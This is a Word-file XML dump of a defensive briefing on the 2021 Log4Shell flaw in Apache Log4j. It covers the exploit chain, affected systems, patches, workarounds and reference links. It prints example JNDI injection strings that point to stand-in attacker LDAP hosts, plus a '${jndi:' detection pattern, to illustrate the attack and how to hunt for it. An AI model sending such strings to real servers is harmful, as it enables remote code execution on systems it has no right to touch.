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qa25b47ddo8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Log4Shell Vulnerability in Log4j (2021)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6081kix18gq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Core Issue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Log4Shell was a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote code execution (RCE) vulnerability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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Log4j 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a widely used Java logging library. The flaw existed because Log4j’s message lookup feature allowed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user-controlled input to trigger JNDI lookups</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which could be redirected to malicious LDAP or RMI servers. By sending a carefully crafted string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${jndi:ldap://attacker.com/a}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), attackers could execute arbitrary code on the target system. The issue was systemic because </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log4j is embedded in countless enterprise and open-source applications</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, making the vulnerability nearly ubiquitous.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y0rg2awi7l0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Who Was Attacked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direct flaw lay in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Log4j</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but attackers targeted any system or software using it. This included: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Enterprise servers (e.g., VMware, IBM, Oracle products).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Popular cloud services (AWS, Azure, Google Cloud).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SaaS platforms, gaming services (Minecraft was one of the first known exploited targets).</w:t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s82soxc760i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Who Was Affected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Millions of applications and services across industries that used Log4j for logging.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Major enterprises, governments, and critical infrastructure operators.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Consumers indirectly, as compromised services could lead to data theft or outages.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Because of its wide reach, Log4Shell was labeled as one of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">most critical software vulnerabilities of the decade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clsjxuu60wd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Exploit Chain Details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Malicious Input Sent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – An attacker injects a crafted string into any input field or header logged by Log4j (e.g., HTTP headers, form fields).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JNDI Lookup Triggered</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Log4j interprets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${jndi:ldap://malicious-server/payload}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and queries the attacker-controlled server.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Payload Delivery</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – The malicious LDAP/RMI server responds with a Java class file containing attacker code.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Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – The vulnerable system loads and executes the payload, giving the attacker full control.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Post-Exploitation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Attackers could deploy cryptominers, steal data, install backdoors, or move laterally inside networks.</w:t>
        <w:br w:type="textWrapping"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590ow51uka5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Prevention / Protection Steps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Immediate Patching</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Upgrade to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log4j 2.16.0+</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (later 2.17.x) where JNDI lookups are disabled by default.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Temporary Workarounds</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Remove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JndiLookup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> class from the classpath, disable message lookups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log4j2.formatMsgNoLookups=true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 Application Firewalls (WAFs)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Block known exploit patterns in HTTP headers and payloads.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Network Segmentation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Restrict outbound LDAP/RMI requests to prevent malicious callbacks.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Threat Hunting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Search logs and telemetry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${jndi:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> patterns and unexpected outbound traffic.</w:t>
        <w:br w:type="textWrapping"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97pgc9pomxl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Fixes &amp; Vendor Response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Apache quickly released patched versions of Log4j (2.15.0 → 2.17.x).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Cloud providers (AWS, Azure, GCP) issued urgent advisories and automatic mitigation scripts.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Governments (e.g., CISA in the U.S.) released emergency directives requiring agencies to patch.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Security vendors provided detection signatures, YARA rules, and scanners.</w:t>
        <w:br w:type="textWrapping"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etbn3givx6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If No Fix Available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Immediately remove the vulnerable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JndiLookup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> class manually.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WAF rules to block malicious JNDI injection attempts.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Monitor all systems for signs of compromise (cryptominer installations, unusual outbound LDAP/RMI traffic).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Restrict network egress from applications to trusted domains only.</w:t>
        <w:br w:type="textWrapping"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sxjp9asn6hn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Reference Material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Apache Log4j Security Vulnerabilities Page (CVE-2021-44228):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://logging.apache.org/log4j/2.x/security.html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CISA Alert (AA21-356A) – Mitigating Log4Shell:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://www.cisa.gov/news-events/alerts/aa21-356a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NVD CVE Entry – CVE-2021-44228 (Log4Shell):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://nvd.nist.gov/vuln/detail/CVE-2021-44228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Microsoft Threat Intelligence – Log4Shell Guidance:</w:t>
        <w:br w:type="textWrapping"/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https://www.microsoft.com/security/blog/2021/12/15/guidance-for-preventing-apache-log4j-2-vulnerability-cve-2021-44228/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Cloudflare Blog – How Log4Shell Works:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/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Rapid7 Analysis – Log4Shell Deep Dive:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://www.rapid7.com/blog/post/2021/12/14/apache-log4j-2-cve-2021-44228-vulnerability-what-you-need-to-know/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yvg3dfxp2hl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Further Reading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ENISA Threat Landscape for Supply Chain Attacks (2021):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://www.enisa.europa.eu/publications/threat-landscape-for-supply-chain-attacks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MITRE ATT&amp;CK – Exploitation for Client Execution (T1203):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://attack.mitre.org/techniques/T1203/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OWASP Top 10 – Injection Vulnerabilities:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://owasp.org/Top10/A03_2021-Injection/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NIST Guidance on Log4Shell Vulnerability:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://csrc.nist.gov/news/2021/apache-log4j-vulnerability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OpenSSF Blog – Supply Chain Lessons from Log4Shell:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://openssf.org/blog/2022/01/04/lessons-learned-from-log4shell/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qnxirxpidv2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Tooling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Log4j Detector Tools (CERT/CC):</w:t>
        <w:br w:type="textWrapping"/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https://github.com/cisagov/log4j-scanner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Nmap Log4Shell NSE Script:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://nmap.org/nsedoc/scripts/vuln.html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Microsoft Defender for Endpoint – Log4Shell exploitation detection:</w:t>
        <w:br w:type="textWrapping"/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https://www.microsoft.com/en-us/security/business/threat-protection/microsoft-defender-endpoint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Zeek – Network monitoring for JNDI-based exploit attempts:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://zeek.org/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YARA – Signature-based detection for Log4Shell exploit strings:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://virustotal.github.io/yara/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VirusTotal – Scan potentially vulnerable JARs and exploit payloads:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> https://www.virustotal.com/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microsoft.com/en-us/security/business/threat-protection/microsoft-defender-endpoint" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/security/business/threat-protection/microsoft-defender-endpoint" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cisagov/log4j-scanner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icrosoft.com/security/blog/2021/12/15/guidance-for-preventing-apache-log4j-2-vulnerability-cve-2021-44228/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/12/15/guidance-for-preventing-apache-log4j-2-vulnerability-cve-2021-44228/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cisagov/log4j-scanne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